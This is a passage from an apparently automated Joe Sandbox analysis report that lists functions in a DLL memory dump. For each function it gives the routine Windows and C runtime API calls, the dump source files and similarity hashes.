                                            • Part of subcall function 6FACA59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FACA5CB
                                            • Part of subcall function 6FACA59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FACA5DD
                                            • Part of subcall function 6FACA59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FACA5EF
                                            • Part of subcall function 6FACA59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FACA601
                                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FACA6D0
                                          • SetLastError.KERNEL32(0000006F), ref: 6FACA6E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                                          • String ID:
                                          • API String ID: 2524245154-3916222277
                                          • Opcode ID: f5f3be525ae9fee2fe7071a10930111bbcb878496e521bac65b46d7c13047f54
                                          • Instruction ID: 984c1d2bfe0d0590a5affb288f3e9da58cf7624d9f1a6816544ce023a8278ddc
                                          • Opcode Fuzzy Hash: f5f3be525ae9fee2fe7071a10930111bbcb878496e521bac65b46d7c13047f54
                                          • Instruction Fuzzy Hash: 14216A7090071C9ACB20DF71C8687EAB7F9BF04324F10869AD069E6180DB786AC5DF51
                                          Function 6FAC8E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FAC8E78
                                          • PathFindExtensionW.SHLWAPI(?), ref: 6FAC8E8E
                                            • Part of subcall function 6FAC8BDF: __EH_prolog3_GS.LIBCMT ref: 6FAC8BE9
                                            • Part of subcall function 6FAC8BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FAC8EB7,?,?), ref: 6FAC8C19
                                            • Part of subcall function 6FAC8BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FAC8C2D
                                            • Part of subcall function 6FAC8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8C69
                                            • Part of subcall function 6FAC8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8C77
                                            • Part of subcall function 6FAC8BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FAC8C94
                                            • Part of subcall function 6FAC8BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FAC8CBF
                                            • Part of subcall function 6FAC8BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FAC8CC8
                                            • Part of subcall function 6FAC8BDF: GetModuleFileNameW.KERNEL32(6FAC0000,?,00000105), ref: 6FAC8D7F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                          • String ID: %s%s.dll
                                          • API String ID: 1311856149-1649984862
                                          • Opcode ID: b345d8d7e81024bb42c143e82ebb0ecb58bcb3f42f8ea098efbd4fb8a5ec441b
                                          • Instruction ID: 2b3361c30a164672b37a30fb50995e4b2c8d2129e6398407a075d9a7ed720483
                                          • Opcode Fuzzy Hash: b345d8d7e81024bb42c143e82ebb0ecb58bcb3f42f8ea098efbd4fb8a5ec441b
                                          • Instruction Fuzzy Hash: C001D671A09618ABCB01CB68E8859FFB3F9FF4A310F0100B9A405EB140DA74DA45CB94
                                          Function 6FADC53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FAD5017: __getptd.LIBCMT ref: 6FAD501D
                                            • Part of subcall function 6FAD5017: __getptd.LIBCMT ref: 6FAD502D
                                          • __getptd.LIBCMT ref: 6FADC54B
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __getptd.LIBCMT ref: 6FADC559
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                                          • Instruction ID: 45bb47352108381146dfe0e54ea06f7ebdc2554d83279fc960d000b540593c76
                                          • Opcode Fuzzy Hash: a711b0bedc9af858f1a86284ce073587ea150faf51f5d3325d337f2bcfad7745
                                          • Instruction Fuzzy Hash: 0701AD70844309CFCF208F60C48479EBBBAAF10210FD8042FF8409A6A2CB38A6C0DF41